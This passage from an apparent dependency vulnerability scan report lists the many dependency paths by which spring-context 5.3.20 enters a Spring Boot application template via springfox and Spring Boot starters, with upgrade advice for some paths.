  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
